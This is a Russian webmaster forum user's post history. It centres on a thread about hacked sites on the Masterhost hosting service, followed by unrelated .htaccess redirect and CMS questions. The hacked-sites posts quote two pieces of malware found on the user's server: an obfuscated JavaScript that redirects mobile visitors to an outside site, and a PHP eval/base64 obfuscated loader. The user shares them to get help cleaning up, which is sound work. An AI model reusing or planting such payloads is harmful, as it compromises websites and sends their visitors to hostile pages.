Ruslan203

Ruslan203
www.gendesign.ru
Рейтинг
99
Регистрация
23.03.2006
Взломы на мастерхост
Кот в сапогах:
Скопируйте код .htaccess пожалуйста, который вставляют, буду очень признателен. Можно в ПМ

/ru/forum/774117

Я его потер, но так как часто меня взламывают, я думаю скоро пришлю:)

---------- Добавлено 11.03.2013 в 22:41 ----------

Еще нашел подозрительны файл counter.html с содержимым:

<script type="text/javascript">
l=~[];l={___:++l,$$$$:(![]+"")[l],__$:++l,$_$_:(![]+"")[l],_$_:++l,$_$$:({}+"")[l],$$_$:(l[l]+"")[l],_$$:++l,$$$_:(!""+"")[l],$__:++l,$_$:++l,$$__:({}+"")[l],$$_:++l,$$$:++l,$___:++l,$__$:++l};l.$_=(l.$_=l+"")[l.$_$]+(l._$=l.$_[l.__$])+(l.$$=(l.$+"")[l.__$])+((!l)+"")[l._$$]+(l.__=l.$_[l.$$_])+(l.$=(!""+"")[l.__$])+(l._=(!""+"")[l._$_])+l.$_[l.$_$]+l.__+l._$+l.$;l.$$=l.$+(!""+"")[l._$$]+l.__+l._+l.$+l.$$;l.$=(l.___)[l.$_][l.$_];l.$(l.$(l.$$+"\""+"\\"+l.__$+l.$_$+l.__$+l.$$$$+"(\\"+l.__$+l.$_$+l.$$_+l.$_$_+"\\"+l.__$+l.$$_+l.$$_+"\\"+l.__$+l.$_$+l.__$+"\\"+l.__$+l.$__+l.$$$+l.$_$_+l.__+l._$+"\\"+l.__$+l.$$_+l._$_+"."+l._+"\\"+l.__$+l.$$_+l._$$+l.$$$_+"\\"+l.__$+l.$$_+l._$_+"\\"+l.__$+l.___+l.__$+"\\"+l.__$+l.$__+l.$$$+l.$$$_+"\\"+l.__$+l.$_$+l.$$_+l.__+".\\"+l.__$+l.$_$+l.$_$+l.$_$_+l.__+l.$$__+"\\"+l.__$+l.$_$+l.___+"(/("+l.$_$_+"\\"+l.__$+l.$_$+l.$$_+l.$$_$+"\\"+l.__$+l.$$_+l._$_+l._$+"\\"+l.__$+l.$_$+l.__$+l.$$_$+"|\\"+l.__$+l.$_$+l.$_$+"\\"+l.__$+l.$_$+l.__$+l.$$_$+"\\"+l.__$+l.$$_+l.___+"|\\"+l.__$+l.$_$+l._$_+l._$_+"\\"+l.__$+l.$_$+l.$_$+l.$$$_+"|\\"+l.__$+l.$$_+l._$$+"\\"+l.__$+l.$$$+l.__$+"\\"+l.__$+l.$_$+l.$_$+l.$_$$+"\\"+l.__$+l.$_$+l.__$+l.$_$_+"\\"+l.__$+l.$_$+l.$$_+"|\\"+l.__$+l.$$_+l._$$+l.$$$_+"\\"+l.__$+l.$$_+l._$_+"\\"+l.__$+l.$_$+l.__$+l.$$$_+"\\"+l.__$+l.$$_+l._$$+"\\"+l.$__+l.___+l.$$_+l.___+"|\\"+l.__$+l.$$_+l._$$+"\\"+l.__$+l.$$$+l.__$+"\\"+l.__$+l.$_$+l.$_$+l.$_$$+l._$+"\\"+l.__$+l.$$_+l._$$+"|\\"+l.__$+l.$$_+l.$$$+"\\"+l.__$+l.$_$+l.__$+"\\"+l.__$+l.$_$+l.$$_+l.$$_$+l._$+"\\"+l.__$+l.$$_+l.$$$+"\\"+l.__$+l.$$_+l._$$+"\\"+l.$__+l.___+"\\"+l.__$+l.$_$+l.$_$+l._$+l.$_$$+"\\"+l.__$+l.$_$+l.__$+(![]+"")[l._$_]+l.$$$_+"|\\"+l.__$+l.$$_+l.$$$+"\\"+l.__$+l.$_$+l.__$+"\\"+l.__$+l.$_$+l.$$_+l.$$_$+l._$+"\\"+l.__$+l.$$_+l.$$$+"\\"+l.__$+l.$$_+l._$$+"\\"+l.$__+l.___+l.$$__+l.$$$_+"|\\"+l.__$+l.$$_+l.___+"\\"+l.__$+l.$$_+l.___+l.$$__+"|\\"+l.__$+l.$$_+l._$$+"\\"+l.__$+l.$_$+l.$_$+l.$_$_+"\\"+l.__$+l.$$_+l._$_+l.__+"\\"+l.__$+l.$$_+l.___+"\\"+l.__$+l.$_$+l.___+l._$+"\\"+l.__$+l.$_$+l.$$_+l.$$$_+"|"+l.$_$$+(![]+"")[l._$_]+l.$_$_+l.$$__+"\\"+l.__$+l.$_$+l._$$+l.$_$$+l.$$$_+"\\"+l.__$+l.$$_+l._$_+"\\"+l.__$+l.$$_+l._$_+"\\"+l.__$+l.$$$+l.__$+"|\\"+l.__$+l.$_$+l.$_$+l.__+"\\"+l.__$+l.$_$+l._$$+"|\\"+l.__$+l.$$_+l.$$$+"\\"+l.__$+l.$_$+l.__$+"\\"+l.__$+l.$_$+l.$$_+l.$$_$+l._$+"\\"+l.__$+l.$$_+l.$$$+"\\"+l.__$+l.$$_+l._$$+"\\"+l.$__+l.___+"\\"+l.__$+l.$$_+l.___+"\\"+l.__$+l.$_$+l.___+l._$+"\\"+l.__$+l.$_$+l.$$_+l.$$$_+")/\\"+l.__$+l.$_$+l.__$+")!==\\"+l.__$+l.$_$+l.$$_+l._+(![]+"")[l._$_]+(![]+"")[l._$_]+"){\\"+l.$__+l.___+"\\"+l.$__+l.___+"\\"+l.__$+l._$_+"\\"+l.$__+l.___+"\\"+l.$__+l.___+"\\"+l.__$+l.$_$+l.__$+l.$$$$+"("+l.$$_$+l._$+l.$$__+l._+"\\"+l.__$+l.$_$+l.$_$+l.$$$_+"\\"+l.__$+l.$_$+l.$$_+l.__+".\\"+l.__$+l.$$_+l._$_+l.$$$_+l.$$$$+l.$$$_+"\\"+l.__$+l.$$_+l._$_+"\\"+l.__$+l.$$_+l._$_+l.$$$_+"\\"+l.__$+l.$$_+l._$_+".\\"+l.__$+l.$_$+l.$_$+l.$_$_+l.__+l.$$__+"\\"+l.__$+l.$_$+l.___+"(/(\\"+l.__$+l.$$$+l.__$+l.$_$_+"\\"+l.__$+l.$_$+l.$$_+l.$$_$+l.$$$_+"\\"+l.__$+l.$$$+l.___+"|\\"+l.__$+l.$__+l.$$$+l._$+l._$+"\\"+l.__$+l.$__+l.$$$+(![]+"")[l._$_]+l.$$$_+"|\\"+l.__$+l.$$_+l._$_+l.$_$_+"\\"+l.__$+l.$_$+l.$_$+l.$_$$+(![]+"")[l._$_]+l.$$$_+"\\"+l.__$+l.$$_+l._$_+"|\\"+l.__$+l.$_$+l.$_$+l.$_$_+"\\"+l.__$+l.$_$+l.__$+(![]+"")[l._$_]+")/\\"+l.__$+l.$_$+l.__$+")!==\\"+l.__$+l.$_$+l.$$_+l._+(![]+"")[l._$_]+(![]+"")[l._$_]+"){\\"+l.__$+l._$_+"\\"+l.$__+l.___+"\\"+l.$__+l.___+"\\"+l.$__+l.___+"\\"+l.$__+l.___+"\\"+l.__$+l.$$_+l.$$$+"\\"+l.__$+l.$_$+l.__$+"\\"+l.__$+l.$_$+l.$$_+l.$$_$+l._$+"\\"+l.__$+l.$$_+l.$$$+"."+(![]+"")[l._$_]+l._$+l.$$__+l.$_$_+l.__+"\\"+l.__$+l.$_$+l.__$+l._$+"\\"+l.__$+l.$_$+l.$$_+"\\"+l.$__+l.___+"=\\"+l.$__+l.___+"\\\"\\"+l.__$+l.$_$+l.___+l.__+l.__+"\\"+l.__$+l.$$_+l.___+"://\\"+l.__$+l.$_$+l.$_$+l._$+l.$_$$+"\\"+l.__$+l.$_$+l.__$+(![]+"")[l._$_]+l.$$$_+"-"+(![]+"")[l._$_]+l._$+l.$_$_+l.$$_$+"\\"+l.__$+l.$_$+l.__$+"\\"+l.__$+l.$_$+l.$$_+"\\"+l.__$+l.$__+l.$$$+"."+l.$$__+l._$+"\\"+l.__$+l.$_$+l.$_$+"/\\"+l.__$+l.$_$+l.$_$+l._$+l.$_$$+"\\"+l.__$+l.$_$+l.__$+(![]+"")[l._$_]+"/\\"+l.__$+l.$__+l.$$$+l._$+".\\"+l.__$+l.$$_+l.___+"\\"+l.__$+l.$_$+l.___+"\\"+l.__$+l.$$_+l.___+"?\\"+l.__$+l.$$_+l._$$+"\\"+l.__$+l.$_$+l.__$+l.$$_$+"="+l._$$+"\\\";\\"+l.__$+l._$_+"\\"+l.$__+l.___+"\\"+l.$__+l.___+"}\\"+l.$__+l.___+"\\"+l.$__+l.___+"\\"+l.__$+l._$_+"}"+"\"")())();
</script>



---------- Добавлено 11.03.2013 в 23:11 ----------

И еще вот такое:


<?php

eval ( gzuncompress ( base64_decode ( 'eNqNUVFKw0AQ/VbwDiNItxFNq0bbKtX+KAjeQGTZJBsTTdqSjaIRwSr+iTfwDlUUimi9wu6NnE0CIm1EFnZ3Zt68eTOzEKbQBhbH7BKqYGzNzS6g5xBImFKfCZ/AEcaJ12o2ueMyq9V0rOb6muV5dWvNXq23PNuz3XXyK9Fhjs+pG8R5Nn66LOJVSvf2D3YpNcAEUiN4T9SaQuMFIc95SgqUkumImUGnyUuCqOCtAlmpE1gEsoGPnsHcbOChW5em/CIQiUCrTJgBlQp0tBVpzj+R2xgtQAYsQ5kmA8+VljHDHb+Xk9NjnlCn10149285mf5r4KHgBUnWzDwEQo9sSmoxSF21E52iVQ7JyGd+oi5LWD7FznF61nV6UT/mQuvr2EzwDYu63Om5uuGpXRA/SfqbtdqJMMN0WfD4nMemHaS1nWKP7dLVVtAUScxZ1F5ZtVok018IzDrOC/bP/jO2JZjs6WcL+RomEHmtX6POkUQ+yTc5ls/qHu9XOZIfcgzqTg3UrRzKT3S+yJG6VQ8gv9QNul7kEOqNRgMwOASdgu43+Y74Mf5G6hHUQHMM0Ic2pmFEfpikEJEt/RsxZD9U' ) ) );

?>
Взломы на мастерхост
'[umka:
;11534355']Не исключён вариант, что на сервере (возможно, только на одном) проблемы с безопасностью и заливают с соседних аккаунтов.
Хотя, вроде, мастерхост.

Там же у каждого свой логин типа uxxxxx сосед ведь только может "прочитать" ... или есть еще какие то хитрости?

Взломы на мастерхост
Den73:
ну проведите эксперемент, вычищайте, меняйте пароли, поломают тогда переезжайте и все повторяйте))

Так я же написал:

Задолбался менять фтп, даже в некоторых отключил но бестолку....
Взломы на мастерхост
Den73:
причем тут хостинг, он не виноват если у вас сайты дырявые, нужно почистить, сменить пароли, включить полное логирование в том числе POST и ждать пока поломают, проблему с сайтами по идеи легко вычислить.

если взломают и в логах не найдете проблему то тогда уже надо менять хостинг и провести эксперемент еще раз))

А если у меня страницы все статичные? Нет там никакого *.php ?

CMS Под Yandex Market

http://djem.ru/ версия BOX

Что делать с удаленными страницами?

Противоречивое какое то мнение... Сам поставил 301 редирект, но и отписался заодно яше, послушаю и его мнение тоже.

Не могу зарегистрироваться на форуме поддержки SMF
mishanya84:


Множить и отнимать типа 2*2+4 могу.... 😂

В чем дело?

Ну в этом уравнении подвоха нет, а в таком виде 4(+|-)2(*|/)2= многие сначала прибавляют или отнимают...

htaccess как убрать *.index.shtml
siv1987:
RewriteRule ^(.*/)?index\.s?html http://www.site/$1 [R=301,L]

Шикарно! огромнейшее человеческое спасибо!

htaccess как убрать *.index.shtml
siv1987:
RewriteRule ^(.*/)index\.s?html http://www.site/$1 [R=301,L]

Это правило работает для всех страниц кроме главной, как и главную редиректить?

htaccess как убрать *.index.shtml
siv1987:
Добавить после правило редиректа на ввв или юзать полный адрес в подстановке - http://www.site/$1

Можете точно написать? А то я в этом к сожалению ввобще профан...

1 2345678910 ...72
Всего: 713